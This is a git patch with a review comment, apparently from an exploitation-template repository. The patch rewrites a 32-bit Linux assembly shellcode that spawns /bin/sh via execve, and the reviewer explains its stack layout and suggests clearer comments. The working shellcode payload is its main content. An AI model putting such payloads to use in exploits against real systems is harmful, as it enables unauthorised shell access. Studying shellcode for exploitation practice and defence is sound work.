From f21e743212f02dbfb560fa74d983a7e156722d11 Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 15 Jan 2023 08:06:42 -0500
Subject: shellcode: Update /bin/sh shellcodes

The shell-spawning shellcodes are rewritten to address the following concerns:
- The array parameters to execve are now set properly, to valid arrays on the stack, instead of NULL pointers.
- The cdq instruction is no longer used to sign-extend the rax register, since it has not been producing the expected results in gdb.
- Labels, sections, and other file metadata are removed in order to support concatenation of shellcode samples to make more complex code.

Signed-off-by: Malfurious
---
templates/shellcode/examples/shell32.asm | 29 +++++++++++++++--------------
1 file changed, 15 insertions(+), 14 deletions(-)

(limited to 'templates/shellcode/examples/shell32.asm')

diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
 
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
- xor ecx, ecx
- xor edx, edx
- push 0xb
- pop eax
- push ecx
- push 0x68732f2f
- push 0x6e69622f
- mov ebx, esp
- int 0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor eax, eax
+xor ecx, ecx
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+mov ebx, esp
+push ecx
+mov edx, esp
+push ebx
+mov ecx, esp
+mov al, 11
+int 0x80
-- cgit v1.2.3
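Review bot: The new header comment `; execve("/bin/sh", ["/bin/sh"], [])` does not match what the code builds: `push 0x68732f2f` / `push 0x6e69622f` lay out the bytes "/bin//sh", and `ebx` (the path) is the same pointer later pushed as argv[0], so both are "/bin//sh"; suggest `; execve("/bin//sh", ["/bin//sh"], [])  ; doubled slash pads the path to two dwords`. The stack layout built between `push ecx` and `mov ecx, esp` also deserves a line of explanation, since the single NULL pushed after `mov ebx, esp` serves as both the argv terminator and the whole envp array (edx points at it, so envp is empty). `mov al, 11` hard-codes the syscall number; a comment such as `; eax = 11 (execve, i386 Linux)` would keep that readable now that the earlier `push 0xb / pop eax` form is gone. Finally, since the commit removes the section and `_start` label, the header should state that this file is a bare fragment meant to be concatenated rather than assembled as a standalone program, as "See shell64.asm for more details" alone does not say so.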